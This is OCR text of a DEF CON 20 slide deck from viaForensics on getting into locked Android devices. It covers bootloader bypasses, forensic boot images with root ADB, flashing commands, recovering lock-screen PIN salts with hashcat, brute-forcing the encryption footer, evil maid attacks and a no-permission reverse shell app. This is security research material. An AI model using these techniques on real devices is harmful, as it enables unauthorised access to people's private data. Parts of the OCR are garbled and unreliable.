nto The Droid Gaining Access to Android User Data VIAFORENSICS DEF CON 20 Introduction • Why this talk is useful • Defend access / gain access • Device seizure, loss, border crossing, stop and search, espionage... • The company • viaForensics - Mobile security and digital forensics, strong R&D team, government agencies and corporations • The speaker • Thomas Cannon - Director of Breaking Things ADB off by default Screen lock Code signing for updates and boot images Encryption Variety of device hardware, software and configuration CHALLENGE ACCEPTED Bootloader Essentials • How we use the bootloader • Accessing bootloader mode • Bootloader protocols • Bootloader protection Defeat The Bootloader S-ON vs S-OFF secuflag controlled in radio firmware Gold Card - specially formatted MicroSD card can bypass carrier ID check when flashing ROMs White Card - special SIM card used as an authentication token to control access to diagnostic mode HTC Example Defeat The Bootloader Emulate White Card with hardware, combine with Gold Card to enter diagnostics and clear S-ON jut HTC Example Defeat The Bootloader White Card not needed for CDMA phones Once S-OFF, can RAM load a custom boot image This technique wipes most devices! But not all. Successfully used this technique to gain access to some locked stock HTC devices such as HTC Desire Try it yourself with an XTC Clip HTC Example Forensic Boot • Start early in the boot chain before the system loads • Provide ADB root shell over USB which can be used to image the device • Do not mount anything, including cache, to prevent any writes to partitions • Devices with raw NAND flash and wear levelling implemented in software (YAFFS2) can be prevented from overwriting deleted data Build Boot $ abootimg -x stock-recovery. img $ abootimg-unpack-initrd $ cd ramdisk (edit ramdisk contents) $ cd .. $ abootimg-pack-initrd -f $ abootimg -u stock-recovery. img -r initrd.img RAM Disk Contents /dev /proc /sbin adbd busybox (+ symlinks) nanddump (to dump partitions) /sys init default. prop (enable root shell, ro.secure=0) init.rc (do not mount partitions, just start adbd) ueventd.rc Flash and RAM Load • Samsung • Dump partitions with ODIN <= 1 .52 or Heimdall. Maybe. • Flashing with ODIN or Heimdall • heimdall flash --recovery recovery.bin (Epic 4G) • heimdall flash --kernel zlmage (Galaxy S) • HTC • fastboot boot recovery.img (RAM Loading) • fastboot flash recovery recovery.img (flash partition) • Motorola • sbfjlash image name.sbf (make sure it only contains recovery) How it works Flasher Box • ORT • Riff Box • Medusa Box mer 1. TRST 2. TCK 3. TDO a. tdi Sh tms 6. &TCK 000 000 Serial • Some devices have debug access via serial cables which can be used to gain access to data • On Samsung Galaxy SI I / Galaxy Note this is activated by grounding ID pin of USB with a 523K ohm resistor • TTL serial access provided on D+ and D- pins of USB connector • Use a Bus Pirate and MicroUSB breakout board to connect Crack PIN or Password • Salt • /data/data/com. android, providers, settings/databases/ settings. db • SELECT * FROM secure WHERE name = ' lockscreen . password_salt' • PIN / password • /data/system/password, key • Salted SHA1 of password concatenated with salted MD5 Crack PIN or Password • Calculate the value of the salt in lowercase hex with no padding $ python -c "print '%x' % 720624377925219614" a002c0dbeb8351e • Copy the last 32 bytes of password. key (MD5 hash in hex), add a colon and then add the salt 5D8EC41 CB1 81 2AC0BD9CB6C4F2CD01 22:a002c0dbeb8351 e • Crack with software such as oclHashcat-lite File Tools Help hashcat cudaHashcat cudaHashcat-plus cudaHashcat-lite Hash: 5D8EC41CB 13 1 ZAC0BD9CB6C4F ZCDO 1 ZZ: aOO ZcOdbebS 3 5 le j/j Mask: 717171717171717171 e Hash type : md 5 (5pass . 5salt) Custom charsets Password length V] Charset 1: ?d o Length: 4 □ Charset Z: □ CharsetS. □ Charset 4: Assume charset is given in hex Assume salt is given in hex Resources ] Use non -blocking async calls GPU devices: Output ] Write recovered hashes to file: GPU workload tuning: 8 GPU loops: GPU watchdog: Open. Z56 Format: hash:pass 90 Start cudaHashcat-lite64.exe -hash-type 1 --custom -charset 1 ?d --pw-max 9 5DSEC41CB1S1ZA |J hashcat-gui File Tools Help hashcat cudaHashcat cudaHashcat-plus cudah Hash: 5D8EC41CB 13 12AC0BD9CB6C4FZCD0 !ZZ:a00Zc0c V] Mask: 717171717171717171 Hash type: md5(5pass.Ssalt) Custom charsets V] Charset 1: ?d o Pa Lf □ Charset 2: □ Charset 3: □ Charset 4: O O Resources Use non -blocking async calls GPU devices: ■I I ^ I C:\Wi n d ows\sy stern J2\cmd .exe cudaHashcat— lite U0.8 by atom starting... GPU-Loops: 1Q24 GPU-Accel: 16 Password lengths range : 4 - 9 Platform: NUidia compatible platform found Uatchdog: Temperature limit set to 90c Device ttl : GeForce GTX 560M, 1536MB, 1550Mh: , 4MCU 5d8ec4icbi812ac0bd9cb6c4f 2cd0122 :a002c0dbeb8351e : 123456789 Status : Cracked Hash. Target . . : 5d8ec41cbl812ac0bd9cb6c4f 2cd0122 :a002c0dbeb8351e Hash. Type . . . . : md5<$pass .$salt > Time .Running. : 2 seconds Time .Left .... : sees Plain .Mask. . . : ?1?1?1?1?1?1?1?1?1 Plain .Text . . . : ****40389 Plain. Length. : 9 Progress : 991723520/1000000000 <99.17>0 Speed. GPU. ttl. : 536.3M/S HUMon.GPU.ttl.: 83x GPU, 46c Temp Started: Ued Jan 11 06:24:04 2012 Stopped: Ued Jan 11 06:24:08 2012 GPU workload tuning: 8 GPU loops: GPU watchdog: 256 90 Start cudaHashcat-lite64.exe -hash -type 1 — c C:\Wi n d ows\sy steim32\cmd .exe cudaHashcat-lite U0.8 by atom starting. GPU-Loops: 1824 GPU-flccel: 16 Password lengths range: 4-9 [Platform : NUidia compatible platform found Uatchdog: Temperature limit set to 90c Deuice ttl: GeForce GTX 560M, 1536MB, 1550Mhs, 4MCU Ll6ec7f 12b91cdd818e4bcf a933947cf 2 :a002c0dbeb8351e : fr4sswd] Status Hash. Target . Hash. Type . . . Time .Running Time .Left . . . Plain .Mask. . Plain .Text . . Plain .Length Progress .... Speed. GPU. ttl HUMon.GPU.ttl Cracked 46ec7fl2b91cdd818e4bcfa933947cf2:a002c0dbeb8351e md5<$pass .5 salt > 47 seconds 54 seconds ?1?1?1?1?1?1 ***ijZ 6 26263945216/56800235584 <46.24>0 561.5M/S 97x GPU, 61c Temp Etarted: Ued Jan 11 07:30:57 2012 Stopped: Ued Jan 11 07:31:48 2012 D HID Brute Force? Video HID Bru AVR ATMEGA32U4 emulates USB keyboard typing PINs USB OTG cable for USB host Devices usually rate limit attempts and wipe after too many incorrect passcodes Force Android Encryption # f x ■ 9:09 I About phone Status Phone number, signal, etc. Legal information Model number Nexus S Android version 4.0.4 Baseband version I9020XXKI1 Kernel version 3.0.8-g6656123 android-buiid{a)vpbsl #1 Thu Feb 2 1 6:56:02 PST 201 2 Build number IMM76D # * A • 9:11 Encrypt phone You can encrypt your accounts, settings, downloaded apps and their data, media, and other files. Once you encrypt your phone, you must enter a numeric PIN or password to decrypt it each time you power it on: you can't unencrypt your phone except by performing a factory data reset, erasing all your data. Encryption takes an hour or more. You must start with a charged battery and keep your phone plugged in until £»n/*»rwrYt-i/-ir\ \t> nnmnloto If \ir\i i Encrypting Wait while your phone is being encrypted. 5% complete. Android Encryption if About phone Status Phone number, signal, etc. Legal information Model number Nexus S Android version 4.0.4 ail A ■ 9:09 Baseband version I9020XXKI1 Kernel version 3.0.8-g6656123 android-build@ V pbsl #1 Thu Feb 2 16:56:02 PST2012 Build number IMM76D • Supported since Android 3.0 • Based on dm-crypt • AES 128 CBC • Implementations may vary, e.g. Samsung has their own key management module Android Encryption keylen=32 Password/PIN PBKDF2 X2000 Key+IV (32 bytes) Key (1 28 bit) IV (1 28 bit) /dev/urandom Salt (128 bit) Master Key (1 28 bit) AES 1 28 CBC Encrypted Master Key (1 28 bit) Android Encryption IV (ESSIV:SHA256) I Master Key (128 bit) — ^MSjlnMlsffil — "Encrypted userdata partition t userdata partition Cracking Encryption 2 3 4 5 6 7 8 9 10 11 12 __le32 magic; __le!6 major_versionj __Iel6 ninorversion ■ __le32 ftr_ s i 2e; __le32 flags; __le32 keysize; — Ie32 sparel; __le64 fs size; _le32 f ail€d_decrypt count ■ Encrypted Master Key + Salt stored in footer Footer stored at end of partition or in a footer file another partition or as a partition itself Image device and locate footer + encrypted userdata partition Crackin Parse footer Locate Salt and Encrypted Master \ Run a password guess through PBKDF2 with salt, use resulting key and IV to decrypt master key, use resulting master key to decrypt first sector of encrypted image. If password is correct, plain text will be revealed ■ 1 Major Version 0xD0B5Bl^^^^™^^^^^^^^ fm Mi nor Version . : 1 m Footer Si 2e ■ F ^gs 104 bytes 1 ■ fey Si 2e 0*00000000 j ■ Failed Decrvnt* 128 bits j ■ Crypto Ty P e yPtS ; 1 ■ Encrypted Key -' ■ Salt ¥ ' fc*2AF933BlA F096g D8 \" Qr 1 I j 1 ' fy ? n e Password: 1 1 Derived K ey . „ 234 ■ 1 Derived IV ^ I De ^ypted Key - « Magic : 0xD0B5BlC4 Major Version : 1 Minor Version : 9 Footer Size i 104 bytes Flags I 0X00000000 Key Size : 128 bits Failed Decrypts: Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0X82AF933B1AF0968D835239CE69526C60 Salt i 0X31D720E6F7F78A23D793E125378E5F49 Trying Password: 1234 @SGGti@3lFwO Derived Key : 0X38E6A59647776E94AD09C1DACA7B4971 Derived IV : 0xB3F8D260076D92AlCFAE7D807DC1613C Decrypted Key : 0X0552393822D311BE023617F258C3E1BB ESSIV IV : 0XB31C2837995393102ECC539D460D77C1 Decrypted Data : 0xEE961EE40CC036D88D2D29206D888FC500000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000 Magic : 0xD0B5BlC4 Major Version : 1 Minor Version : Footer Size : 104 bytes Flags I 0X00000000 Key Size : 128 bits Failed Decrypts: Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0X82AF933B1AF0968D835239CE69526C60 Salt : 0X31D720E6F7F78A23D793E125378E5F49 Trying Password: 5555 UlISSGSSwlFwj Derived Key : 0x3AC2D38F705281EBB45430D5770B2BFD Derived IV : 0xAF4CB6F2C3481C20B8430DE869608A4A Decrypted Key : 0x85BE68592503F89CB0F9BBD82972AE07 ESSIV IV : 0X52989B5B082368326FB4014D06A0A67C Decrypted Data : 0XB0D17B11AB13D1C432A4816ABF39319976187A54D58961B7808191E6AA4F4 06E8A4DCC2D4986F377981D79AD7C625390545B3033472EB069AEC33451BF8DDB8E6B4A502C41A61 1309BDFC3E65A88027B7ECCB1B7D04573EAD6194C87C0A8D661E62D942354EF218378E76EB30BFB2 5E97391AC9A268BCD49F274680313ED1D1FFD4663B249A282CCC49D5C54EB528427FCC43B3CDF2FC 86892271F89736CE53BBD117BFBB8025DA75C74EF46025F6AC1547DA8D3F1FCC6542DA0EBA9F5D87 0D3743E5440D61D4DDAE26048018002C597335FDDB84AF89922E0C165128A3C51082877CE9F51840 12FFE73CA346922B1F931E3C6EE30AC781479D2DB6FB168965A92809B54523DC228AC473AE8164A8 F20A2BB74617CFB536AF3B61BBF0C273BE30F006E646817E42FD4579B8F3B34934C12F5D280CE764 F1381120D746683F2AC5AF825CC25AE089B355044E86CC207484A0F365E465C7B2E980456D4C0BA8 462A19EF4227E1E3AF92A9386BF585894327740647B537DB96302B51899DED97B37FC49D1B35F618 FC4F775E3FB159DD4800FB8577C38404AAD366E18E1A62C2E944CDE45732A9B5E20F80D6DE03FCAF 855CE41D1D8CE3D033FE8B05F861F781DCA100A18DF910EA519A6E52C15DADCCC8C10A42AC3D7BD0 DE37C3B28932131D37198BD7AB1D48CB895C8B1159715F49424887D245034C6510F43FED085CBE23 8CA • Cracking PINs takes seconds. Passwords are usually short or follow patterns due to being the same as the lock screen password Evil Maid Attack Load app onto system partition, wait for to boot phone, get remote access to decrypted user data Rootkits - easy to compile for Android Evil USB charger Reverse Shell QvFWebShell <- GO localhost:8080/shell/njncRoO4 © ft H H ^ ■ 5554:Android-2.3 vF Android WebShell Started uid=10039 #20 Wed Mar 31 09:54:02 PDT 2010 (gcc version d rwxr-x system d rwxr-x system d rwxr-x system rwxr-x system d rwxr-x system rwxr-x system sdcard_rw 2011-11-17 04:37 LOST.DIR sdcard_rw 2011-11-17 22:23 DCIM sdcard_rw 2011-11-22 04:17 Android sdcard_rw 13861 2011-12-12 14:33 Twilight .apk sdcard_rw 2011-12-12 14:16 download sdcardrw 16294 2011-12-12 14:20 AndRevShell . apk C:\WindQW2\system3 2\crnd.exe - python andrevshell.py = C:\Users\Thorias\Docunents\Pro jects\uiaForensics\flndReuShell>python andrevshell.p FteuShell Server running on port 8080 I :H6 sday, December 13 Charging (50%) VIAFORENSICS innovative digital fore nsics and security • App with no permissions can create a reverse shell, giving remote access to attacker Desperate • Hard reset - some devices prior to 3.0 did not wipe data properly. Wipe, boot, root and recover • Chip-off - de-solder NAND chips • Screen smudges Techniques More Techniques! • Custom update.zip - can you get one signed? • Race condition on updates via SD cards - fixed • Own a CA? Who doesn't these days? MITM connection, push app, update or exploit • Entry via Google Play, if credentials cached on desktop Santoku Linux Free and open bootable Linux distribution full of tools Project is a collaboration with other mobile security pros Mobile Forensics Mobile App Security Testing Mobile Malware Analysis Check out the Alpha release at https://santoku-linux.com VIAFORENSICS Thomas Cannon 'thomas.cannon github.com/thomascannon tcannon@viaforensics.com For the latest versions of our presentations visit: httDs://viaforensics.com/resources/Dresentations